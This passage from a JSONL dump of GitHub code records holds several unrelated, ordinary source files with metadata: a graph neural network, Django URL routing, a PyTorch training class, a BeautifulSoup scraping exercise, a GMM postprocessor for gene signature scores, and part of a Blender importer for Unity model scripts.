F.relu(X)\r\n X = F.dropout(X, p=self.dropout_rate, training=self.training)\r\n\r\n\r\n GNN_conv_list_1.append(X)\r\n\r\n\r\n muilt_gcn_out = torch.cat(GNN_conv_list_1, dim=0)\r\n Att_out = self.semantic_level_attention(muilt_gcn_out, 
len(edge_index_dict))\r\n\r\n embedding=Att_out\r\n embedding =embedding.detach().cpu()\r\n\r\n if target_id_set == None:\r\n return embedding\r\n else:\r\n return embedding[target_id_set,:]\r\n\r\n\r\n\r\n\r\n\r\n\r\n", "repo_name": "Zhonny/LHGI", "sub_path": "LHGI.py", "file_name": "LHGI.py", "file_ext": "py", "file_size_in_byte": 4271, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.nn", "line_number": 13, "usage_type": "attribute"}, {"api_name": "torch_geometric.nn.Linear", "line_number": 18, "usage_type": "call"}, {"api_name": "layers.SemanticAttentionLayer", "line_number": 20, "usage_type": "call"}, {"api_name": "layers.AvgReadout", "line_number": 21, "usage_type": "call"}, {"api_name": "layers.Discriminator", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.sigmoid", "line_number": 23, "usage_type": "attribute"}, {"api_name": "torch_geometric.nn.GCNConv", "line_number": 25, "usage_type": "call"}, {"api_name": "torch_geometric.nn.GCNConv", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.random.permutation", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 36, "usage_type": "attribute"}, {"api_name": "torch.nn.functional.relu", "line_number": 41, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 41, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 43, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 54, "usage_type": "name"}, {"api_name": "torch.nn.functional.dropout", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 55, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 58, "usage_type": "name"}, {"api_name": "torch.nn.functional.dropout", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 59, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 63, "usage_type": "name"}, {"api_name": "torch.nn.functional.dropout", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 64, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 67, "usage_type": "name"}, {"api_name": "torch.nn.functional.dropout", "line_number": 68, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 68, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 78, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 92, "usage_type": "call"}, {"api_name": "torch.nn.functional.relu", "line_number": 111, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 111, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 117, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 117, "usage_type": "name"}, {"api_name": "torch.nn.functional.dropout", "line_number": 118, 
"usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 118, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 121, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 121, "usage_type": "name"}, {"api_name": "torch.nn.functional.dropout", "line_number": 122, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 122, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 128, "usage_type": "call"}]} +{"seq_id": "28006594653", "text": "from django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\nfrom django.urls import include, path, reverse_lazy\nfrom django.views import defaults as default_views\nfrom django.views.generic import TemplateView\nfrom rest_framework.authtoken.views import obtain_auth_token\nfrom djsniper.users import views as accounts_views\n\n\nurlpatterns = [\n #path(\"\", include(\"djsniper.sniper.urls\", namespace=\"sniper\")),\n #path(\"developer/\", include(\"djsniper.developers.urls\", namespace=\"developer\")),\n #path(\"enterprise/\", include(\"djsniper.enterprise.urls\", namespace=\"enterprise\")),\n path(\n \"about/\", TemplateView.as_view(template_name=\"pages/about.html\"), name=\"about\"\n ),\n # Django Admin, use {% url 'admin:index' %}\n path(settings.ADMIN_URL, admin.site.urls),\n # User management\n path(\"users/\", include(\"djsniper.users.urls\", namespace=\"users\")),\n path(\"accounts/\", include(\"allauth.urls\")),\n #path('developer-home/', accounts_views.developer_home, name='developer_home'),\n #path('investor-home/', accounts_views.investor_home, name='investor_home'),\n #path('enterprise-home/', accounts_views.enterprise_home, name='enterprise_home'),\n path(\"celery-progress/\", include(\"celery_progress.urls\")),\n # Your stuff: custom urls includes go here\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\n# API URLS\nurlpatterns += [\n # API base url\n path(\"api/\", include(\"config.api_router\")),\n # DRF auth token\n path(\"auth-token/\", obtain_auth_token),\n]\n\nif settings.DEBUG:\n # This allows the error pages to be debugged during development, just visit\n # these url in browser to see how these error pages look like.\n urlpatterns += [\n path(\n \"400/\",\n default_views.bad_request,\n kwargs={\"exception\": Exception(\"Bad Request!\")},\n ),\n path(\n \"403/\",\n default_views.permission_denied,\n kwargs={\"exception\": Exception(\"Permission Denied\")},\n ),\n path(\n \"404/\",\n default_views.page_not_found,\n kwargs={\"exception\": Exception(\"Page not Found\")},\n ),\n path(\"500/\", default_views.server_error),\n ]\n if \"debug_toolbar\" in settings.INSTALLED_APPS:\n import debug_toolbar\n\n urlpatterns = [path(\"__debug__/\", include(debug_toolbar.urls))] + urlpatterns\n\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL,\n document_root=settings.MEDIA_ROOT)\n urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n", "repo_name": "alexandraramirezmolano/test", "sub_path": "config/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 2632, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "django.views.generic.TemplateView.as_view", "line_number": 16, "usage_type": "call"}, {"api_name": "django.views.generic.TemplateView", "line_number": 16, "usage_type": 
"name"}, {"api_name": "django.urls.path", "line_number": 19, "usage_type": "call"}, {"api_name": "django.conf.settings.ADMIN_URL", "line_number": 19, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 19, "usage_type": "name"}, {"api_name": "django.contrib.admin.site", "line_number": 19, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 19, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 21, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 21, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 22, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 22, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 26, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 26, "usage_type": "call"}, {"api_name": "django.conf.urls.static.static", "line_number": 28, "usage_type": "call"}, {"api_name": "django.conf.settings.MEDIA_URL", "line_number": 28, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 28, "usage_type": "name"}, {"api_name": "django.conf.settings.MEDIA_ROOT", "line_number": 28, "usage_type": "attribute"}, {"api_name": "django.urls.path", "line_number": 33, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 33, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 35, "usage_type": "call"}, {"api_name": "rest_framework.authtoken.views.obtain_auth_token", "line_number": 35, "usage_type": "argument"}, {"api_name": "django.conf.settings.DEBUG", "line_number": 38, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 38, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 42, "usage_type": "call"}, {"api_name": "django.views.defaults.bad_request", "line_number": 44, "usage_type": "attribute"}, {"api_name": "django.views.defaults", "line_number": 44, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 47, "usage_type": "call"}, {"api_name": "django.views.defaults.permission_denied", "line_number": 49, "usage_type": "attribute"}, {"api_name": "django.views.defaults", "line_number": 49, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 52, "usage_type": "call"}, {"api_name": "django.views.defaults.page_not_found", "line_number": 54, "usage_type": "attribute"}, {"api_name": "django.views.defaults", "line_number": 54, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 57, "usage_type": "call"}, {"api_name": "django.views.defaults.server_error", "line_number": 57, "usage_type": "attribute"}, {"api_name": "django.views.defaults", "line_number": 57, "usage_type": "name"}, {"api_name": "django.conf.settings.INSTALLED_APPS", "line_number": 59, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 59, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 62, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 62, "usage_type": "call"}, {"api_name": "debug_toolbar.urls", "line_number": 62, "usage_type": "attribute"}, {"api_name": "django.conf.settings.DEBUG", "line_number": 65, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 65, "usage_type": "name"}, {"api_name": "django.conf.urls.static.static", "line_number": 66, "usage_type": "call"}, {"api_name": "django.conf.settings.MEDIA_URL", "line_number": 66, "usage_type": "attribute"}, {"api_name": 
"django.conf.settings", "line_number": 66, "usage_type": "name"}, {"api_name": "django.conf.settings.MEDIA_ROOT", "line_number": 67, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 67, "usage_type": "name"}, {"api_name": "django.conf.urls.static.static", "line_number": 68, "usage_type": "call"}, {"api_name": "django.conf.settings.STATIC_URL", "line_number": 68, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 68, "usage_type": "name"}, {"api_name": "django.conf.settings.STATIC_ROOT", "line_number": 68, "usage_type": "attribute"}]} +{"seq_id": "11577217897", "text": "import os\nimport pickle\nfrom datetime import datetime\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision.transforms as T\nfrom models import basenet\nfrom models import load_data\nimport utils\n\nclass BasicModel():\n def __init__(self, opt):\n self.epoch = 0\n self.device = opt['device']\n self.save_path = opt['save_folder']\n self.print_freq = opt['print_freq']\n self.init_lr = opt['optimizer_setting']['lr']\n \n self.set_network(opt)\n self.set_data(opt)\n self.set_optimizer(opt)\n self.best_acc = 0.\n\n def set_network(self, opt):\n if opt['input_type'] == 'latefusion': \n print('Initializing model which takes in two frames')\n self.network = basenet.ResNet50(n_classes=opt['output_dim'],\n pretrained=True,\n dropout=opt['dropout']).to(self.device)\n elif opt['input_type'] == 'randomframe' or opt['input_type'] == 'centerframe':\n print('Initializing model which takes in one frame')\n self.network = basenet.ResNet50_base(n_classes=opt['output_dim'],\n pretrained=True, \n dropout=opt['dropout']).to(self.device)\n\n def forward(self, x):\n out, feature = self.network(x)\n return out, feature\n\n def set_data(self, opt):\n \"\"\"Set up the dataloaders\"\"\"\n \n data_setting = opt['data_setting']\n if opt['input_type'] == 'latefusion':\n print('Feeding in first and last frames as input')\n loader_class = load_data.MyDataset_latefusion \n dataset_kwargs = {}\n elif opt['input_type'] == 'randomframe':\n print('Feeding in a random frame as input')\n loader_class = load_data.MyDataset_singleframe\n dataset_kwargs = {'get_random':True} \n elif opt['input_type'] == 'centerframe':\n print('Feeding in center frame as input')\n loader_class = load_data.MyDataset_singleframe\n dataset_kwargs = {'get_random':False}\n self.loader_train = load_data.create_dataset_actual(data_setting['path'], data_setting['train_params'], loader_class, kwargs=dataset_kwargs) \n self.loader_test = load_data.create_dataset_actual(data_setting['path'], data_setting['test_params'], loader_class, split='test', kwargs=dataset_kwargs)\n\n \n def set_optimizer(self, opt):\n optimizer_setting = opt['optimizer_setting']\n self.optimizer = optimizer_setting['optimizer']( \n params=filter(lambda p: p.requires_grad, self.network.parameters()), \n lr=optimizer_setting['lr'],\n weight_decay=optimizer_setting['weight_decay']\n )\n \n def _criterion(self, output, target):\n return F.cross_entropy(output, target)\n \n def state_dict(self):\n state_dict = {\n 'model': self.network.state_dict(),\n 'optimizer': self.optimizer.state_dict(),\n 'epoch': self.epoch\n }\n return state_dict\n\n def log_result(self, name, result, step):\n self.log_writer.add_scalars(name, result, step)\n\n def _train(self, loader):\n \"\"\"Train the model for one epoch\"\"\"\n \n self.network.train()\n \n train_loss = 0\n output_list = []\n target_list = []\n for i, (images, 
targets) in enumerate(loader):\n images, targets = images.to(self.device), targets.to(self.device)\n #print(images.shape)\n self.optimizer.zero_grad()\n outputs, _ = self.forward(images)\n loss = self._criterion(outputs, targets)\n loss.backward()\n self.optimizer.step()\n\n train_loss += loss.item()\n #self.log_result('Train iteration', {'loss': loss.item()},\n # len(loader)*self.epoch + i)\n\n if self.print_freq and (i % self.print_freq == 0):\n print('Training epoch {}: [{}|{}], loss:{}'.format(\n self.epoch, i+1, len(loader), loss.item()), flush=True)\n \n output_list.append(outputs)\n target_list.append(targets)\n #self.log_result('Train epoch', {'loss': train_loss/len(loader)}, self.epoch)\n self.epoch += 1\n \n return train_loss, torch.cat(output_list), torch.cat(target_list)\n\n def _test(self, loader):\n \"\"\"Compute model output on test set\"\"\"\n \n self.network.eval()\n\n test_loss = 0\n output_list = []\n feature_list = []\n target_list = []\n with torch.no_grad():\n for i, (images, targets) in enumerate(loader):\n images, targets = images.to(self.device), targets.to(self.device)\n outputs, features = self.forward(images)\n loss = self._criterion(outputs, targets)\n test_loss += loss.item()\n\n output_list.append(outputs)\n feature_list.append(features)\n target_list.append(targets)\n\n\n return test_loss, torch.cat(output_list), torch.cat(feature_list), torch.cat(target_list)\n\n def inference(self, output, detach=False):\n predict_prob = torch.sigmoid(output)\n if detach:\n return predict_prob.cpu().detach().numpy()\n return predict_prob.cpu().numpy()\n \n def save_model(self, path):\n torch.save(self.network.state_dict(), path)\n \n def train(self):\n \"\"\"Train the model for one epoch, evaluate on validation set and \n save the best model\n \"\"\"\n \n start_time = datetime.now()\n train_loss, train_output, targets = self._train(self.loader_train)\n train_predict_prob = self.inference(train_output, True)\n train_acc = utils.get_accuracy(train_predict_prob, targets.cpu().numpy(), k=3)\n self.save_model(os.path.join(self.save_path, 'current.pth'))\n \n test_loss, test_output, _ , targets = self._test(self.loader_test)\n test_predict_prob = self.inference(test_output)\n test_acc = utils.get_accuracy(test_predict_prob, targets.cpu().numpy(), k=3)\n if test_acc > self.best_acc:\n self.best_acc = test_acc\n self.save_model(os.path.join(self.save_path,'best.pth'))\n \n\n duration = datetime.now() - start_time\n print('Finish training epoch {}, time used: {}, train_acc: {}, test_acc: {}'.format(self.epoch, duration, train_acc, test_acc))\n\n \n def test(self):\n # Test and save the result\n\n test_loss, test_output, _ , targets= self._test(self.loader_test)\n test_predict_prob = self.inference(test_output)\n \n\n acc = utils.get_accuracy(test_predict_prob, targets.cpu().numpy(), k=3)\n", "repo_name": "felixy12/COS529_Project", "sub_path": "ResNet2D/models/baseline.py", "file_name": "baseline.py", "file_ext": "py", "file_size_in_byte": 6994, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "models.basenet.ResNet50", "line_number": 29, "usage_type": "call"}, {"api_name": "models.basenet", "line_number": 29, "usage_type": "name"}, {"api_name": "models.basenet.ResNet50_base", "line_number": 34, "usage_type": "call"}, {"api_name": "models.basenet", "line_number": 34, "usage_type": "name"}, {"api_name": "models.load_data.MyDataset_latefusion", "line_number": 48, "usage_type": "attribute"}, {"api_name": 
"models.load_data", "line_number": 48, "usage_type": "name"}, {"api_name": "models.load_data.MyDataset_singleframe", "line_number": 52, "usage_type": "attribute"}, {"api_name": "models.load_data", "line_number": 52, "usage_type": "name"}, {"api_name": "models.load_data.MyDataset_singleframe", "line_number": 56, "usage_type": "attribute"}, {"api_name": "models.load_data", "line_number": 56, "usage_type": "name"}, {"api_name": "models.load_data.create_dataset_actual", "line_number": 58, "usage_type": "call"}, {"api_name": "models.load_data", "line_number": 58, "usage_type": "name"}, {"api_name": "models.load_data.create_dataset_actual", "line_number": 59, "usage_type": "call"}, {"api_name": "models.load_data", "line_number": 59, "usage_type": "name"}, {"api_name": "torch.nn.functional.cross_entropy", "line_number": 71, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 71, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 125, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 137, "usage_type": "call"}, {"api_name": "torch.sigmoid", "line_number": 140, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 146, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 153, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 153, "usage_type": "name"}, {"api_name": "utils.get_accuracy", "line_number": 156, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 157, "usage_type": "call"}, {"api_name": "os.path", "line_number": 157, "usage_type": "attribute"}, {"api_name": "utils.get_accuracy", "line_number": 161, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 164, "usage_type": "call"}, {"api_name": "os.path", "line_number": 164, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 167, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 167, "usage_type": "name"}, {"api_name": "utils.get_accuracy", "line_number": 178, "usage_type": "call"}]} +{"seq_id": "23726312424", "text": "from urllib.request import urlopen\nfrom bs4 import BeautifulSoup\n\nhtml = urlopen(\"https://www.pythonscraping.com/pages/page3.html\")\n\nbs = BeautifulSoup(html, \"html.parser\")\n\nfor child in bs.find(\"table\", {\"id\": \"giftList\"}).children:\n print(child)\n\nfor sibling in bs.find(\"table\", {\"id\": \"giftList\"}).tr.next_siblings:\n print(sibling)\n\nprint(bs.find(\"img\", {\"src\": \"../img/gifts/img1.jpg\"}).parent.previous_sibling.get_text())\n", "repo_name": "welderessutti/exercises_and_studies", "sub_path": "web_scraping_with_python_book/navigating_trees.py", "file_name": "navigating_trees.py", "file_ext": "py", "file_size_in_byte": 433, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "urllib.request.urlopen", "line_number": 4, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 6, "usage_type": "call"}]} +{"seq_id": "14021725807", "text": "import os\nimport sys\nfrom typing import List, Optional, Union\n\nimport numpy as np\nimport pandas as pd\nimport scipy\nfrom anndata import AnnData\nfrom matplotlib import pyplot as plt\nfrom pandas import DataFrame\nfrom sklearn.mixture import GaussianMixture\nfrom sklearn.preprocessing import StandardScaler\n\nsys.path.append('../..')\nfrom src.utils.utils import commonPrefix\n\n\ndef check_score_names(adata: 
AnnData, score_names: List[str]):\n \"\"\"\n Asserts that names associated with score columns exist in the data.\n Args:\n adata: AnnData object containing the gene expression data.\n score_names: Names of score columns\n\n Returns:\n None\n\n Raises:\n Assertion error if any value in `score_names` is not contained in `adata`\n \"\"\"\n assert isinstance(score_names, list) and len(score_names) > 0, \\\n f'score_names needs to be of type list. We need at least one score_name'\n\n assert all([x in adata.obs.columns for x in score_names]), f'score_names conatains names not ' \\\n f'corresponding to columns in adata.obs'\n\n\nclass GMMPostprocessor:\n \"\"\"\n The GMMPostprocessor class is used to correct for incomparable score ranges in gene signature scoring.\n If fits a Gaussian Mixture Model on gene signature scores and assigns clusters to signatures.\n\n Attributes:\n n_components: Defines the number of clusters we expect in the Gaussian Mixture Model. For postprocessing gene\n expression signatures we use n_components=#signatures or n_components=(#signatures+1).\n gmm: Corresponds to the GMM used for postprocessing.\n \"\"\"\n\n def __init__(self, n_components: int = 3, covariance_type: str = 'full', init_params: str = 'k-means++',\n n_init: int = 30):\n \"\"\"\n Args:\n n_components: Number of clusters we expect in the Gaussian Mixture Model.\n covariance_type: The type of covariance used in GMM. Available methods 'full', 'tied', 'diag', 'spherical'.\n init_params: Method to initialize parameters in GMM. Available methods 'kmeans', 'k-means++', 'random',\n 'random_from_data'\n n_init: Number of initializations done.\n \"\"\"\n self.n_components = n_components\n self.covariance_type = covariance_type\n self.init_params = init_params\n self.n_init = n_init\n\n self.gmm = GaussianMixture(n_components=n_components,\n covariance_type=covariance_type,\n init_params=init_params,\n n_init=n_init,\n random_state=0)\n\n def fit_and_predict(self, adata: AnnData, score_names: List[str], store_name: Optional[str] = None,\n inplace: bool = True) -> Union[str, List[str], Optional[DataFrame]]:\n \"\"\"\n The method fits previously initialized GMM on signature scores.\n Args:\n adata: AnnData object containing the gene expression data.\n score_names: Name of signature scores columns on which the GMM is fit.\n store_name: Prefix of new columns with probabilities\n inplace: If probabilities are stored in `adata` or in a new pandas DataFrame\n\n Returns:\n If 'inplace=True', the names of the new columns are returned.\n If 'inplace=False', the names of the new columns and the DataFrame containing the cluster probabilities are\n returned.\n \"\"\"\n if store_name is None:\n store_name = commonPrefix(score_names, 0, len(score_names) - 1)\n print(f'GMM model for {store_name} scores.')\n check_score_names(adata, score_names)\n curr_data = adata.obs[score_names].copy()\n print(f'> standardize data')\n curr_data = StandardScaler().fit_transform(curr_data)\n print(f'> fit and predict probabilities')\n gm_pred = self.gmm.fit_predict(curr_data)\n gm_proba = self.gmm.predict_proba(curr_data)\n\n store_name_pred = store_name + '_GMM_pred'\n store_names_proba = [(store_name + f'_{x}_GMM_proba') for x in range(self.n_components)]\n\n if inplace:\n adata.obs[store_name_pred] = gm_pred\n adata.obs[store_names_proba] = gm_proba\n return store_name_pred, store_names_proba, None\n else:\n pred_and_proba_df = pd.DataFrame(np.hstack([gm_pred.reshape(-1, 1), gm_proba]),\n index=adata.obs.index,\n columns=([store_name_pred] + 
store_names_proba))\n return store_name_pred, store_names_proba, pred_and_proba_df\n\n def assign_clusters_to_signatures(self, adata: AnnData, score_names: List[str], gmm_proba_names: List[str],\n plot: bool = False, store_plot_path: Optional[str] = None) -> dict:\n \"\"\"\n The methods computed the assignments of GMM clusters to gene expression signatures by computing the correlation\n of each cluster probabilities to the signatures' scores.\n\n Args:\n adata: AnnData object containing the gene expression data.\n score_names: Name of signature scores columns.\n gmm_proba_names: Name of GMM cluster probability columns.\n plot: Plot scatterplots of scores and probabilities for each signature and GMM cluster.\n store_plot_path: Path to location where scatterplots should be stored. If None, plots are not stored.\n\n Returns:\n The assignments of each signature to a cluster from GMM postprocessing.\n\n \"\"\"\n check_score_names(adata, score_names + gmm_proba_names)\n\n signature_group_assignments = {}\n if plot:\n fig, ax = plt.subplots(nrows=len(score_names), ncols=len(gmm_proba_names),\n figsize=(len(gmm_proba_names) * 5, len(score_names) * 5))\n for k, sco in enumerate(score_names):\n max_corr = 0\n max_group = None\n for l, group in enumerate(gmm_proba_names):\n corr = scipy.stats.pearsonr(adata.obs[sco], adata.obs[group])\n print(corr, sco, group)\n if plot:\n ax[k, l].scatter(adata.obs[sco], adata.obs[group])\n x_label = sco.split('_')[-1]\n y_label = '_'.join(group.split('_')[-3:])\n ax[k, l].set_xlabel(x_label)\n ax[k, l].set_ylabel(y_label)\n ax[k, l].set_title(f'corr({x_label}, {y_label})=\\n{corr}')\n # if corr[1] < 0.01 and corr[0] > max_corr:\n if corr[0] > max_corr:\n max_corr = corr[0]\n max_group = group\n signature_group_assignments[sco] = max_group\n if len(set(gmm_proba_names).difference(set(signature_group_assignments.values()))) > 0:\n signature_group_assignments['rest'] = set(gmm_proba_names).difference(\n set(signature_group_assignments.values()))\n if plot:\n fig.subplots_adjust(hspace=0.3)\n store_name = commonPrefix(score_names, 0, len(score_names) - 1)\n fig.suptitle(store_name)\n if store_plot_path is not None:\n fig.savefig(os.path.join(store_plot_path, f'{store_name}scores_vs_proba.png'), format='png')\n\n return signature_group_assignments\n", "repo_name": "BoevaLab/ANS_supplementary_information", "sub_path": "src/scoring_methods/gmm_postprocessing.py", "file_name": "gmm_postprocessing.py", "file_ext": "py", "file_size_in_byte": 7517, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.path.append", "line_number": 14, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "anndata.AnnData", "line_number": 18, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 18, "usage_type": "name"}, {"api_name": "sklearn.mixture.GaussianMixture", "line_number": 64, "usage_type": "call"}, {"api_name": "anndata.AnnData", "line_number": 70, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 70, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 70, "usage_type": "name"}, {"api_name": "src.utils.utils.commonPrefix", "line_number": 86, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 91, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 104, "usage_type": "call"}, 
{"api_name": "typing.Union", "line_number": 71, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 71, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 71, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 71, "usage_type": "name"}, {"api_name": "anndata.AnnData", "line_number": 109, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 109, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 110, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 130, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 130, "usage_type": "name"}, {"api_name": "scipy.stats.pearsonr", "line_number": 136, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 136, "usage_type": "attribute"}, {"api_name": "src.utils.utils.commonPrefix", "line_number": 155, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 158, "usage_type": "call"}, {"api_name": "os.path", "line_number": 158, "usage_type": "attribute"}]} +{"seq_id": "15191074188", "text": "bl_info = {\n \"name\": \"Unity Model Script Importer\",\n \"author\": \"ata4\",\n \"version\": (0, 2, 0),\n \"blender\": (2, 6, 0),\n \"location\": \"File > Import-Export\",\n \"description\": \"Imports Unity model scripts exported by the Mesh2BPY script\",\n \"warning\": \"\",\n \"support\": \"COMMUNITY\",\n \"category\": \"Import-Export\",\n }\n\nimport bpy, bmesh, math, re\n\n# ImportHelper is a helper class, defines filename and\n# invoke() function which calls the file selector.\nfrom bpy_extras.io_utils import ImportHelper\nfrom bpy.props import StringProperty, BoolProperty, EnumProperty\nfrom bpy.types import Operator\nfrom mathutils import Vector, Quaternion\n\nclass ImportPythonModel(Operator, ImportHelper):\n \"\"\"This appears in the tooltip of the operator and in the generated docs\"\"\"\n bl_idname = \"import_mesh.unity\"\n bl_label = \"Import Unity model script\"\n\n # ImportHelper mixin class uses this\n filename_ext = \".py\"\n \n def __init__(self):\n self.model = None\n\n def execute(self, context):\n # compile and execute provided script\n script = open(self.filepath).read()\n script_c = compile(script, self.filepath, 'exec')\n globals = {}\n \n exec(script_c, globals)\n \n self.model = globals.get('model')\n \n # test if the \"model\" variable is defined\n if not self.model:\n print(\"No model variable found!\")\n return {'CANCELLED'}\n \n # get rid of \"mesh\" in the model name\n pattern = re.compile(\"mesh\", re.IGNORECASE)\n self.model['name'] = pattern.sub(\"\", self.model['name'])\n \n # build model\n self.build_model()\n\n return {'FINISHED'}\n \n def build_model(self):\n print(\"Building %s\" % self.model['name'])\n \n # create empty\n ob = bpy.data.objects.new(self.model['name'], None)\n ob.rotation_euler = (math.radians(90), 0, 0)\n\n # build mesh\n me = self.build_geometry()\n\n # create mesh object\n ob_mesh = bpy.data.objects.new(self.model['name'] + \" Mesh\", me)\n ob_mesh.location = self.model['pos']\n ob_mesh.rotation_quaternion = self.model['rot']\n #ob_mesh.scale = self.model['scl']\n ob_mesh.parent = ob\n \n # create armature\n amt = bpy.data.armatures.new(self.model['name'])\n amt.show_names = True\n \n # create armature object\n ob_amt = bpy.data.objects.new(self.model['name'] + \" Armature\", amt)\n ob_amt.show_x_ray = True\n ob_amt.draw_type = 'WIRE'\n ob_amt.parent = ob\n \n # Give mesh object an armature modifier, using vertex groups but\n # not envelopes\n mod = 
ob_mesh.modifiers.new('Armature', 'ARMATURE')\n mod.object = ob_amt\n mod.use_bone_envelopes = False\n mod.use_vertex_groups = True\n \n # link objects to scene\n bpy.context.scene.objects.link(ob)\n bpy.context.scene.objects.link(ob_mesh)\n bpy.context.scene.objects.link(ob_amt)\n \n # build armature\n bpy.context.scene.objects.active = ob_amt\n self.build_armature(ob_mesh, ob_amt)\n \n def build_geometry(self):\n # create mesh data and BMesh\n me = bpy.data.meshes.new(self.model['name'])\n bm = bmesh.new()\n \n # create vertices\n for vert in self.model['verts']:\n bm.verts.new(vert) \n \n # to avoid slow iterator lookups later / indexing verts is slow in bmesh\n bm_verts = bm.verts[:]\n \n # set of indices of duplicate faces\n dupfaces = set()\n \n for submesh_index, submesh in enumerate(self.model['submeshes']):\n # get name of material\n mat_name = self.model['materials'][submesh_index]\n \n # create and append material\n mtl = bpy.data.materials.get(mat_name)\n if not mtl:\n mtl = bpy.data.materials.new(name = mat_name)\n me.materials.append(mtl)\n \n # create faces\n for face_index, face in enumerate(zip(submesh[0::3], submesh[1::3], 